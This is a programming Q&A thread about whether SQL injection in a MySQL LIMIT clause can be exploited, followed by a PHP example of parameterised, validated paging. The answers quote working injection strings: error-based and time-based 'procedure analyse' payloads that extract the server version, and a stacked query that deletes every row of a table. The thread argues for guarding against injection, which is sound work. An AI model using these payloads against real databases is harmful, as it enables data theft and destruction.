SQL Injection and LIMIT Clause

This question is to settle a dispute between me and a colleague.

Let's say we have the following query executed on a standard LAMP server.

SELECT field1, field2, field3
FROM some_table
WHERE some_table.field1 = 123
ORDER BY field2 DESC
LIMIT 0, 15

Now suppose the limit clause is vulnerable to SQL injection.

LIMIT [insert anything here], [also insert anything here]

My colleague's point is that there is no way to exploit this injection, so there is no need to guard against it (since doing so requires more computing power, etc.).

I think her reasoning is stupid, but I cannot figure out how to prove her wrong by finding an example.

I can't use UNION, because the query has an ORDER BY clause, and the MySQL user executing the query does not have the FILE privilege, so using INTO OUTFILE is also out of the question.



+4
5

Injection into LIMIT is possible even when the query has ORDER BY; the technique is from Maurycy Prodeus:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1
       procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

The same technique also works time-based, for example:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1
PROCEDURE analyse((select extractvalue(rand(),
concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

SLEEP cannot be used in this position, so BENCHMARK is used instead.

+4

For example:

1; DELETE FROM some_table WHERE 1; --

This returns 1 row from some_table and then DELETEs every row of some_table.

+1



Another option is stacking a second statement after a ';'.

I just did this on my local mysql server:

SELECT * FROM city order by ID desc limit 0,15; SELECT * FROM city

However, even in the strongest case, where there is an absolute 0% chance that someone can change the statement, you still do not want to receive possibly altered data. There must be a reason why you are using LIMIT dynamically. As soon as a person can change your query, you have already failed. This is not even about the risk of data loss or whatever; you do not want any manipulation at all.

0
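The fix the whole thread points toward is to never splice user input into LIMIT at all. The following is an added example for the LAMP stack described in the question, not code from the question or any of the answers; it assumes a PDO connection `$pdo` to a MySQL database containing `some_table`, and the function names `limitArgs` and `fetchPage` are hypothetical.

```php
<?php
// Added example (not from the original question or answers): paging the query
// from the question without interpolating user-supplied values into LIMIT.
// Assumes a PDO connection $pdo to a MySQL database containing some_table.

declare(strict_types=1);

const PAGE_SIZE_MAX = 100;   // hypothetical cap on rows per page

/**
 * Validate the offset and count as unsigned integers before they go anywhere
 * near the statement. Inputs such as "1; DELETE FROM some_table WHERE 1; --"
 * or the procedure analyse() payloads quoted above fail here, not in MySQL.
 */
function limitArgs(string $offset, string $count): array
{
    if (!ctype_digit($offset) || !ctype_digit($count)) {
        throw new InvalidArgumentException('LIMIT arguments must be unsigned integers');
    }
    $count = min((int)$count, PAGE_SIZE_MAX);   // keep page sizes bounded
    return [(int)$offset, $count];
}

function fetchPage(PDO $pdo, int $field1, string $offset, string $count): array
{
    [$off, $cnt] = limitArgs($offset, $count);

    // With emulated prepares (PDO's default for mysql) a plain execute([...])
    // would quote the LIMIT values as strings ('0', '15'), which MySQL rejects.
    // Binding them as PDO::PARAM_INT sends them as bare integers, so there is
    // no need to fall back to string interpolation for LIMIT.
    $stmt = $pdo->prepare(
        'SELECT field1, field2, field3
           FROM some_table
          WHERE some_table.field1 = :f1
          ORDER BY field2 DESC
          LIMIT :off, :cnt'
    );
    $stmt->bindValue(':f1',  $field1, PDO::PARAM_INT);
    $stmt->bindValue(':off', $off,    PDO::PARAM_INT);
    $stmt->bindValue(':cnt', $cnt,    PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Example call with the values from the question: page 1 of 15 rows.
// $rows = fetchPage($pdo, 123, '0', '15');
```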

Source: https://habr.com/ru/post/1535186/
